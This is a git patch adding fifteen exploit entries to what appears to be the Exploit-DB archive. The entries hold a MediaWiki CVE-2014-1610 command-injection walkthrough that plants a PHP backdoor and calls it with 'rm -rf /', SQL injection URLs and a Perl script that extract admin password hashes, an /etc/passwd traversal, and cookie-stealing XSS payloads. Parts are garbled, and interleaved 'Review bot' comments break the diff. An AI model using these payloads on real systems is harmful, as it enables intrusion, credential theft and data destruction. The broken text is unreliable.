From 8a34f6a372c6199a07575af007f7585faf8c7276 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 3 Feb 2014 04:26:33 +0000
Subject: [PATCH] Updated 02_03_2014

---
 files.csv | 14 ++
 platforms/bsd/dos/31333.txt | 16 +++
 platforms/hardware/remote/31340.html | 9 ++
 platforms/hardware/remote/31342.txt | 14 ++
 platforms/multiple/webapps/31329..txt | 183 ++++++++++++++++++++++++++
 platforms/php/webapps/31331.txt | 7 +
 platforms/php/webapps/31332.txt | 7 +
 platforms/php/webapps/31334.txt | 7 +
 platforms/php/webapps/31335.txt | 7 +
 platforms/php/webapps/31336.txt | 9 ++
 platforms/php/webapps/31337.txt | 95 +++++++++++++
 platforms/php/webapps/31339.txt | 10 ++
 platforms/php/webapps/31341.txt | 9 ++
 platforms/php/webapps/31344.pl | 60 +++++++++
 platforms/windows/remote/31345.txt | 9 ++
 15 files changed, 456 insertions(+)
 create mode 100755 platforms/bsd/dos/31333.txt
 create mode 100755 platforms/hardware/remote/31340.html
 create mode 100755 platforms/hardware/remote/31342.txt
 create mode 100755 platforms/multiple/webapps/31329..txt
 create mode 100755 platforms/php/webapps/31331.txt
 create mode 100755 platforms/php/webapps/31332.txt
 create mode 100755 platforms/php/webapps/31334.txt
 create mode 100755 platforms/php/webapps/31335.txt
 create mode 100755 platforms/php/webapps/31336.txt
 create mode 100755 platforms/php/webapps/31337.txt
 create mode 100755 platforms/php/webapps/31339.txt
 create mode 100755 platforms/php/webapps/31341.txt
 create mode 100755 platforms/php/webapps/31344.pl
 create mode 100755 platforms/windows/remote/31345.txt

diff --git a/files.csv b/files.csv
index fcf14d17e..624d4db31 100755
--- a/files.csv
+++ b/files.csv
@@ -28135,3 +28135,17 @@ id,file,description,date,author,platform,type,port
 31325,platforms/php/webapps/31325.txt,"KC Wiki 1.0 simplest/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0
 31326,platforms/php/webapps/31326.txt,"Flyspray 0.9.9 Information Disclosure, HTML Injection, and Cross-Site Scripting Vulnerabilities",2008-03-03,"Digital Security Research Group",php,webapps,0
 31328,platforms/php/webapps/31328.txt,"TorrentTrader 1.08 'msg' Parameter HTML Injection Vulnerability",2008-03-03,Dominus,php,webapps,0
+31329,platforms/multiple/webapps/31329..txt,"MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)",2014-02-01,@u0x,multiple,webapps,0
+31331,platforms/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module 'pid' Parameter SQL Injection Vulnerability",2008-03-04,"Aria-Security Team",php,webapps,0
+31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module 'fileName' Parameter Local File Include Vulnerability",2008-03-04,The-0utl4w,php,webapps,0
+31333,platforms/bsd/dos/31333.txt,"BSD PPP 'pppx.conf' Local Denial of Service Vulnerability",2008-03-04,sipherr,bsd,dos,0
+31334,platforms/php/webapps/31334.txt,"Mitra Informatika Solusindo Cart 'p' Parameter SQL Injection Vulnerability",2008-03-04,bius,php,webapps,0
+31335,platforms/php/webapps/31335.txt,"MG2 'list' Parameter Cross-Site Scripting Vulnerability",2008-03-04,"Jose Carlos Norte",php,webapps,0
+31336,platforms/php/webapps/31336.txt,"Podcast Generator 0.96.2 'set_permissions.php' Cross-Site Scripting Vulnerability",2008-03-05,ZoRLu,php,webapps,0
+31337,platforms/php/webapps/31337.txt,"WebCT 4.1.5 Email and Discussion Board Messages HTML Injection Vulnerability",2007-06-25,Lupton,php,webapps,0
+31339,platforms/php/webapps/31339.txt,"PHP-Nuke Yellow_Pages Module 'cid' Parameter SQL Injection Vulnerability",2008-03-05,ZoRLu,php,webapps,0
+31340,platforms/hardware/remote/31340.html,"Check Point VPN-1 UTM Edge NGX 7.0.48x Login Page Cross-Site 
Scripting Vulnerability",2008-03-06,"Henri Lindberg",hardware,remote,0
+31341,platforms/php/webapps/31341.txt,"Yap Blog 1.1 'index.php' Remote File Include Vulnerability",2008-03-06,THE_MILLER,php,webapps,0
+31342,platforms/hardware/remote/31342.txt,"Airspan ProST WiMAX Device Web Interface Authentication Bypass Vulnerability",2008-03-06,"Francis Lacoste-Cordeau",hardware,remote,0
+31344,platforms/php/webapps/31344.pl,"PHP-Nuke KutubiSitte Module 'kid' Parameter SQL Injection Vulnerability",2008-03-06,r080cy90r,php,webapps,0
+31345,platforms/windows/remote/31345.txt,"MicroWorld eScan Server 9.0.742 Directory Traversal Vulnerability",2008-03-06,"Luigi Auriemma",windows,remote,0
diff --git a/platforms/bsd/dos/31333.txt b/platforms/bsd/dos/31333.txt
new file mode 100755
index 000000000..5abbd9f27
--- /dev/null
+++ b/platforms/bsd/dos/31333.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/28090/info
+
+BSD PPP is prone to a local denial-of-service vulnerability because it fails to perform adequate boundary checks on user-supplied input.
+
+Attackers can leverage this issue to crash the application and deny service to legitimate users. Given the nature of the issue, arbitrary code execution may also be possible, but this has not been confirmed.
+
+This issue affects FreeBSD 6.3 and unspecified versions of NetBSD and OpenBSD; other versions may also be affected.
+
+~/~/~/~/~/~/~/~/~/~/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxx
+
diff --git a/platforms/hardware/remote/31340.html b/platforms/hardware/remote/31340.html
new file mode 100755
index 000000000..ae3de53d3
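Review bot: The path in the new 31329 row, `platforms/multiple/webapps/31329..txt`, carries a doubled dot before the extension, and the file created later in this same commit uses the identical name, so index and file agree but both preserve the typo. Every other row added here follows the `<id>.<ext>` pattern; renaming the file to `31329.txt` and changing this row to `31329,platforms/multiple/webapps/31329.txt,...` would keep the archive naming consistent and avoid a stray double-extension lookup.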
--- /dev/null
+++ b/platforms/hardware/remote/31340.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28116/info
+
+Check Point VPN-1 UTM Edge is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+The issue affects Check Point VPN-1 UTM Edge firmware 7.0.48x.
+
+
\ No newline at end of file
diff --git a/platforms/hardware/remote/31342.txt b/platforms/hardware/remote/31342.txt
new file mode 100755
index 000000000..511cae6fd
--- /dev/null
+++ b/platforms/hardware/remote/31342.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/28122/info
+
+Airspan ProST WiMAX device is prone to an authentication-bypass vulnerability because it fails to perform adequate authentication checks in the web interface.
+
+An attacker can exploit this issue to gain unauthorized access to the affected device and make arbitrary changes to its configuration. This may lead to further attacks.
+
+POST /process_adv/ HTTP/1.1
+Host: 10.0.0.1
+Keep-Alive: 300
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 22
+
+DialogText=&Advanced=1
\ No newline at end of file
diff --git a/platforms/multiple/webapps/31329..txt b/platforms/multiple/webapps/31329..txt
new file mode 100755
index 000000000..7b1a43383
--- /dev/null
+++ b/platforms/multiple/webapps/31329..txt
@@ -0,0 +1,183 @@ +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA1 + +#################################################################### +# +# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610) +# Reported by Netanel Rubin - Check Point’s Vulnerability Research Group (Jan 19, 2014) +# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014) +# Affected website : Wikipedia.org and more ! +# +# Exploit author : Xelenonz & @u0x (Pichaya Morimoto) +# Release dates : Feb 1, 2014 +# Special Thanks to 2600 Thailand ! +# +#################################################################### + +# Exploit: +#################################################################### +1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled) +http://vulnerable-site/index.php/Special:Upload +2. inject os cmd to upload a php-backdoor +http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20 +"images/xnz.php` +3. access to php-backdoor! +http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root +4. happy pwning!! + + +# Related files: +#################################################################### +thumb.php <-- extract all _GET array to params +/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width +options +/includes/media/ImageHandler.php +/includes/GlobalFunctions.php +/includes/filerepo/file/File.php + +# Vulnerability Analysis: +#################################################################### +1. thumb.php +This script used to resize images if it is configured to be done +when the web browser requests the image +transform( $params, File::RENDER_NOW ); // << resize image +by width/height +... +// Stream the file if there were no errors +$thumb->streamFile( $headers ); +... +?> +2. /includes/filerepo/file/File.php +getHandler(); // << PDF Handler +... +$normalisedParams = $params; +$handler->normaliseParams( $this, $normalisedParams ); +... 
+$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params ); +.. +?> +3. /extensions/PdfHandler/PdfHandler_body.php +&1"; +... +$err = wfShellExec( $cmd, $retval ); +... +?> +4. /includes/GlobalFunctions.php +Execute a shell command, with time and memory limits +Error generating thumbnail + +

Error generating thumbnail

+

+?????????????????????????????: /bin/bash: -: command not found
+convert: option requires an argument `-resize' @ +error/convert.c/ConvertImageCommand/2380.
+GPL Ghostscript 9.10: Unrecoverable error, exit code 1
+ +

+ + + + + +GET /mediawiki1221/images/longcat.php?1=id HTTP/1.1 +Host: 127.0.0.1 +Connection: keep-alive +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Encoding: gzip,deflate,sdch +Accept-Language: en-US,en;q=0.8 +Cookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2; +my_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1 + +uid=33(www-data) gid=33(www-data) groups=33(www-data) + + +# Back-end $cmd +#################################################################### +GlobalFunctions.php : wfShellExec() +cmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 +-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' | +'/usr/bin/convert' -depth 8 -resize 10|`echo "images/longcat.php` - +'/tmp/transform_0e377aad0e27-1.jpg') 2>&1 + +-----BEGIN PGP SIGNATURE----- +Version: GnuPG v1.4.14 (GNU/Linux) + +iQIcBAEBAgAGBQJS7SLLAAoJEB2kHapd1XMU8BcP/A+hMUw/EDwChN+2XjtExVGU +BzPrpXXBbp6WGWkeztmrT78Y1b1lXX/cQA4V9IGrdHUEdgG0p3y476d7eZ5sPxVf +ny9Xg7o4WtMgmSvSOOc+lCsy9aAKab801cs1HLbwZokwK8ItwQQoGfik0BgNQ4l1 +mijELis1z1f3k6yJ9/OJicnIJDmHIzPL9wQyr2A5c+jjz74SR//SlQPrqDbvEpj2 +uCCpTpjf6LGYCzyGmqROlf+OxFTeXdB9oghButrEtQ9w6qGQg1/UZjmbx/xLkCqb +GO1R4qs0PuV4uepwcbLzDDWW5kPejPjcwpuyjrpQO45OcIUtkvzR4iypCxxkvktv +n2l09Dtn9HqbK3QXhTb2u3uhM9RyJd7kFKhfmZ85OnvMmYvaXSeDWs7Wd9GEO5wh +FXbhL9O2u/bqiabQKnsJ6bx8hcm2a9mO+/yJZUyBXybHrjseRD4LQFWUYR/WPAQt +vuICIQyO5pcjkIib+0DN4e7xcFMYuo3o6WkSZuZT+l0LwYDVmhUbaGAEP13+dWZZ +M0HGoI7AITsqukYFH1n7NYjJazF3Bckc0iJbCrI39TYkvr3V9bRWSEfVBM6FcBan +kumwDlzYP/301fsKGLtfsnUmK2qkj1EF3DVoJbZ5VFdgiUSlCMsbp9qdGfUPbelR +2LmeyQR2rzjBB7Sovvcn +=ooEs +-----END PGP SIGNATURE----- diff --git a/platforms/php/webapps/31331.txt b/platforms/php/webapps/31331.txt new file mode 100755 index 000000000..005a340be --- /dev/null +++ b/platforms/php/webapps/31331.txt 
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28088/info
+
+The eGallery module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/modules.php?name=eGallery&file=index&op=showpic&pid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
\ No newline at end of file
diff --git a/platforms/php/webapps/31332.txt b/platforms/php/webapps/31332.txt
new file mode 100755
index 000000000..5f0211b5d
--- /dev/null
+++ b/platforms/php/webapps/31332.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28089/info
+
+The PHP-Nuke 'Seminars' module is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+Exploiting this issue may allow an unauthorized remote user to view files and execute local scripts in the context of the webserver process.
+
+http://www.example.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
\ No newline at end of file
diff --git a/platforms/php/webapps/31334.txt b/platforms/php/webapps/31334.txt
new file mode 100755
index 000000000..b48b0ed79
--- /dev/null
+++ b/platforms/php/webapps/31334.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28096/info
+
+Mitra Informatika Solusindo Cart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?c=10&p=-7%20union%20select%200,concat(user_name,user_password),null,null,null,null,null,null%20from%20tbl_agen--
\ No newline at end of file
diff --git a/platforms/php/webapps/31335.txt b/platforms/php/webapps/31335.txt
new file mode 100755
index 000000000..6dbf71479
--- /dev/null
+++ b/platforms/php/webapps/31335.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28098/info
+
+MG2 is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/admin.php?action=import&list=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/31336.txt b/platforms/php/webapps/31336.txt
new file mode 100755
index 000000000..17c0fc22a
--- /dev/null
+++ b/platforms/php/webapps/31336.txt
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28106/info + +Podcast Generator is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Podcast Generator 0.96.2 is vulnerable; other versions may also be affected. + +http://www.example.com/podcastgen-0.96.2/setup/set_permissions.php?scriptlang=">Thank you + + +Attack 2 - Firefox Exploit (Manual): +Click Me! + +Attack 2 - Firefox Exploit (Manual) - Decoded: + + + diff --git a/platforms/php/webapps/31339.txt b/platforms/php/webapps/31339.txt new file mode 100755 index 000000000..4aa374a55 --- /dev/null +++ b/platforms/php/webapps/31339.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/28109/info + +The Yellow_Pages module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +This issue affects the Yellow_Pages 1; other versions may also be vulnerable. + +http://www.example.com/modules.php?name=Yellow_Pages&file=viewdir&cid=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2 + diff --git a/platforms/php/webapps/31341.txt b/platforms/php/webapps/31341.txt new file mode 100755 index 000000000..49e9a4b6e --- /dev/null +++ b/platforms/php/webapps/31341.txt 
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28120/info
+
+Yap Blog is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+Versions prior to Yap Blog 1.1.1 are vulnerable.
+
+http://www.example.com/[path]/index.php?page=[Sh3llAddress]
\ No newline at end of file
diff --git a/platforms/php/webapps/31344.pl b/platforms/php/webapps/31344.pl
new file mode 100755
index 000000000..808514aea
--- /dev/null
+++ b/platforms/php/webapps/31344.pl
@@ -0,0 +1,60 @@
+source: http://www.securityfocus.com/bid/28126/info
+
+The KutubiSitte module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+#!/usr/bin/perl use Getopt::Std;
+use LWP::UserAgent;
+
+sub usg{
+printf("
+
+
+ -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
+ | PHP-NUKE KutubiSitte [kid] => SQL Injection |
+ -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
+ #######################################################
+ # Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 #
+ #######################################################
+<-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->->
+#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
+#:-------------------------------------------------------:#
+:#| USAGE: |#:
+:#| exploit.pl -h [Hostname] -p [Path] -U [User_Id] |#:
+#:-------------------------------------------------------:#
+#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
+#:-------------------------------------------------------:#
+:#| EXAMPLE: |#:
+:#| exploit.pl -h http://site.com -p /php-nuke/ -U 1 |#:
+#:-------------------------------------------------------:#
+#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
+
+
+");
+}
+sub problem{
+ print "\n\n[~] SITO NON VULNERABILE [~]\n\n";
+ exit();
+}
+sub exploitation{
+ $conn = LWP::UserAgent -> new;
+ $conn->agent('Checkbot/0.4 ');
+ $query_pwd =
+$host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%
+2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".$user_id."%2F%2A";
+ $return_pwd = $conn->get($query_pwd) || problem();
+ $return_pwd->content() =~ /([0-9,a-f]{32})/ || 
problem();
+ print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n ";
+ }
+
+getopts(":h:p:U:",\%args);
+ $host = $args{h} if (defined $args{h});
+ $path = $args{p} if (defined $args{p});
+ $user_id= $args{U}if (defined $args{U});
+ if (!defined $args{h} || !defined $args{p} || !defined $args{U}){
+ usg();
+ }
+ else{
+ exploitation();
+ }
diff --git a/platforms/windows/remote/31345.txt b/platforms/windows/remote/31345.txt
new file mode 100755
index 000000000..09d5310d3
--- /dev/null
+++ b/platforms/windows/remote/31345.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28127/info
+
+MicroWorld eScan Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+Exploiting this issue allows an attacker to access arbitrary files outside of the FTP server root directory. This can expose sensitive information that could help the attacker launch further attacks.
+
+eScan Server 9.0.742.98 is vulnerable to this issue; other versions may also be affected.
+
+ftp://SERVER:2021//windows/win.ini
\ No newline at end of file
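Review bot: The new 31344.pl is not well-formed Perl as committed: its first six lines are the advisory text outside any comment, and the shebang on line 7 reads `#!/usr/bin/perl use Getopt::Std;`, so the `use` statement sits on the interpreter line instead of being a statement of its own. For an archived script the advisory header belongs in `#` comments (or a POD block) and the shebang and `use Getopt::Std;` on separate lines, which is how the other `.pl` entries in this archive are normally laid out. The script also has no `use strict; use warnings;`, which is why the package globals `$conn`, `$host`, `$path`, `$user_id` and `%args` are assigned without declaration; that is a style point rather than a functional one, but it is the first thing `perlcritic` would flag.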